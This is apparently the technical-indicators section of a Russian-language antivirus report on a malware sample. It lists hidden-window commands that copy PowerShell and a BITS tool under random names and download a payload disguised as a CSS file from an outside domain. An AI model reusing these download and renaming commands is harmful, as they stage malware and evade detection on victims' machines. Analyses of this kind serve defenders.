Техническая информация
- '%ALLUSERSPROFILE%\lydmvznin.exe' /transfer XLgOuT /download https://empanswers.com/rispo/04691260287/blank.css %APPDATA%\blank.css
- %ALLUSERSPROFILE%\zlpulozb.exe
- %ALLUSERSPROFILE%\lydmvznin.exe
- 'em###swers.com':443
- DNS ASK em###swers.com
- 'localhost':63102
- 'localhost':50737
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zlPULozB.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\LYDMvzN*.exe' (со скрытым окном)
- '%ALLUSERSPROFILE%\lydmvznin.exe' /transfer XLgOuT /download https://empanswers.com/rispo/04691260287/blank.css %APPDATA%\blank.css' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zlPULozB.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zlPULozB.exe
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\LYDMvzN*.exe